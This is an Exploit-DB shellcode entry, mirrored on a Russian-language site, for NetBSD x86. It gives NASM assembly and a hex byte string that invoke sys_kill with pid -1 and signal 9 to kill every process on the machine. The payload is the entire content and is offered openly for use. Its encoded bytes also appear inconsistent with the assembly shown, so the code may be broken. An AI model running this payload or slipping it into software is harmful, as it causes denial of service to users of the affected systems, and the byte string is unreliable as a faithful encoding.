- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13470
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- SHELLCODE
- Платформа
- NETBSD_X86
- CVE
- N/A
- Дата публикации
- 2009-06-18
C:
/*
netbsd/x86 kill all processes shellcode
author Anonymous
this shellcode is using syscall number 37 or 0x25
37 STD { int sys_kill(int pid, int signum); }
here is assembler code using intel syntaxe and NASM
--------------begin-----------
section .note.netbsd.ident
dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000
section .data
section .text
global _start
_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80
-------------------------end------------
if we dissasemble this code wi will get shellcode
"\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"
*/
// milw0rm.com [2009-06-18]
- Источник
- www.exploit-db.com